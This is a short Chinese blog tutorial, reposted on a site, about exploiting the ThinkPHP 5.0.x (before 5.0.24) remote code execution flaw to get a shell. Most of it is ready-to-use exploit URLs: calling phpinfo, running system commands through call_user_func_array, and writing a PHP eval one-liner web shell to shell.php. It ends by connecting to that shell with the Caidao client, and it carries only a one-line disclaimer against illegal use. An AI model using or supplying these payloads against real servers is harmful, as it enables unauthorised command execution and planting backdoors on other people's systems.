当前位置:   article > 正文

如何利用ThinkPHPv5的漏洞来getshell_thinkphp v5.1.39 漏洞获取主机shell

thinkphp v5.1.39 漏洞获取主机shell
影响范围

ThinkPHP 5.0系列 < 5.0.24

过程

查看信息

http://ip(url)/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=id(1,2,3之类的)

http://ip(url)/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=想执行的系统命令
  • 1
  • 2

爆错得到cms为tp5信息(一般情况下不太可能)
在这里插入图片描述

http://ip(url)/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=1

    查看phpinfo()
    在这里插入图片描述

    http://ip(url)/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=想写入的东西

      下面的已经的写了一句话

      http://ip(url)/index.php?
      ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]=<?php eval($_REQUEST["shell"]);?>
      • 1

      在这里插入图片描述写入成功

      菜刀连接

      因为一句话写到了shell.php 所以这里这里连接到shell.php就行了

      在这里插入图片描述

      ps:小编也是刚入门,有不足的地方请大佬们多多指教
      想对和我一样的小白们说:严禁用来干非法之事,搞自己的靶机不香吗

      声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/269724
      推荐阅读
      相关标签
        

      闽ICP备14008679号